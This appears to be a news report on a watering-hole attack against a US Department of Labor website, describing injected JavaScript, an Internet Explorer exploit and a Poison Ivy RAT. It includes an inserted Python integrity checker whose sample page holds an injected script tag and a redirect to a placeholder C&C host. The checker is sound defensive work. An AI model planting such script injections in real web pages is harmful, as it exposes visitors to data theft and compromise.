In fact, the infection was discovered on April 30 by Invincea. “We received a tip that a site hosted by the United States Department of Labor (USDOL) had been compromised and was hosting malicious code,” blogged Anup Ghosh, the company’s founder and CEO yesterday. This was separately confirmed by Jaime Blasco, director at AlienVault. “During the last few hours,” he also blogged yesterday, “we have identified that one [of] the U.S. Department of Labor website[s] has been hacked and it is serving malicious code.”
The malicious code is JavaScript that collects data from the visitor, sends the data to a remote C&C server, and redirects the visitor to that server. The malicious server then tries to exploit the CVE-2012-4792 vulnerability – a use-after-free flaw in Internet Explorer 6 to 8 that was first discovered in December 2012 and has since been fixed by Microsoft. If successful, it installs (according to Invincea) a variant of the Poison Ivy RAT.
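The injection described above (script pulled from an outside host, plus a forced redirect) is the kind of change a site owner can catch with routine content-integrity checks. The following is an added example written for this article, not code from Invincea, AlienVault or the Department of Labor: it fingerprints a page against a known-good baseline and flags script tags that load from hosts outside an allowlist or that redirect the visitor. The sample pages and the hostnames `www.dol.gov.example` and `cnc.example.invalid` are constructed placeholders, not the real site or the real C&C server.

```python
import hashlib
import re
from urllib.parse import urlparse

# Constructed sample pages (not the real DoL content or payload): a clean page,
# and the same page with an injected external script plus a forced redirect.
CLEAN_PAGE = """<html><head><title>Labor stats</title>
<script src="/static/app.js"></script></head>
<body><p>Quarterly report</p></body></html>"""

INJECTED_PAGE = """<html><head><title>Labor stats</title>
<script src="/static/app.js"></script>
<script src="http://cnc.example.invalid/loader.js"></script>
<script>window.location = "http://cnc.example.invalid/landing";</script></head>
<body><p>Quarterly report</p></body></html>"""

# Assumption: the only hosts this site is expected to load script from.
ALLOWED_HOSTS = {"www.dol.gov.example"}

SCRIPT_SRC = re.compile(r'<script[^>]*\ssrc=["\']([^"\']+)["\']', re.I)
INLINE_SCRIPT = re.compile(r'<script(?![^>]*\ssrc=)[^>]*>(.*?)</script>', re.I | re.S)
REDIRECT = re.compile(r'(window\.|document\.)?location(\.href)?\s*=|location\.replace\(', re.I)


def page_fingerprint(html: str) -> str:
    """SHA-256 of the served page; compare against the last known-good value."""
    return hashlib.sha256(html.encode("utf-8")).hexdigest()


def external_script_hosts(html: str) -> list[str]:
    """Hosts named in <script src=...> that are not on the allowlist.
    Relative paths have no hostname and are treated as same-origin."""
    hosts = []
    for src in SCRIPT_SRC.findall(html):
        host = urlparse(src).hostname
        if host and host not in ALLOWED_HOSTS:
            hosts.append(host)
    return hosts


def inline_redirects(html: str) -> list[str]:
    """Inline script bodies that reassign location, i.e. force a redirect."""
    return [body.strip() for body in INLINE_SCRIPT.findall(html) if REDIRECT.search(body)]


def check_page(html: str, baseline_fingerprint: str) -> dict:
    """Combine the three checks into one finding for an integrity monitor."""
    findings = {
        "content_changed": page_fingerprint(html) != baseline_fingerprint,
        "external_script_hosts": external_script_hosts(html),
        "inline_redirects": inline_redirects(html),
    }
    findings["suspicious"] = bool(
        findings["external_script_hosts"] or findings["inline_redirects"]
    )
    return findings


if __name__ == "__main__":
    baseline = page_fingerprint(CLEAN_PAGE)
    print(check_page(CLEAN_PAGE, baseline))
    print(check_page(INJECTED_PAGE, baseline))
```

The fingerprint check alone fires on any legitimate edit, so the allowlist and redirect checks are what separate a content update from an injection worth paging someone about; in practice the baseline would be taken from the deployment pipeline rather than from a fetched copy of the page.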
AlienVault doesn’t specify that malware, but notes that, “The C&C protocol matches with a backdoor used by a known Chinese actor called DeepPanda.” DeepPanda’s modus operandi has been analyzed by CrowdStrike. “All of these samples reflect common toolmarks and tradecraft consistent with Chinese based actors who target various strategic interests of the United States including High Tech/Heavy Industry, Non-Governmental Organizations (NGOs), State/Federal Government, Defense Industrial Base (DIB), and organizations with vast economic interests.”
Invincea notes that the malware’s attack methodology “fits the enterprise user machine profile typical of large enterprise and government agencies.” Ghosh conjectures that this was a watering hole attack designed to compromise Department of Labor staff who might visit the compromised Department of Labor website. The purpose would be to get a foothold into the wider Labor department network.
If Ghosh is right and the malware is Poison Ivy delivered through a patched vulnerability to XP machines, then the obvious question is simply: how could this happen today? The reality, however, is that it works very well on large organizations. A slight change to the malware alters its signature and evades anti-virus detection. The vulnerability is patched, but only recently, and there is an inevitable time lapse between the issue of a patch and its implementation; the larger the organization, the longer the delay. And finally, many large organizations are not quick to update their operating systems, and XP remains very popular.
All of this seems to point to a very targeted attack attempting to get inside the Department of Labor. The Department of Labor itself has said nothing (at the time of writing) about the incident, but it does appear that the compromised website is no longer hosting the JavaScript. What isn’t known is whether the attackers gained their foothold and are now inside the network.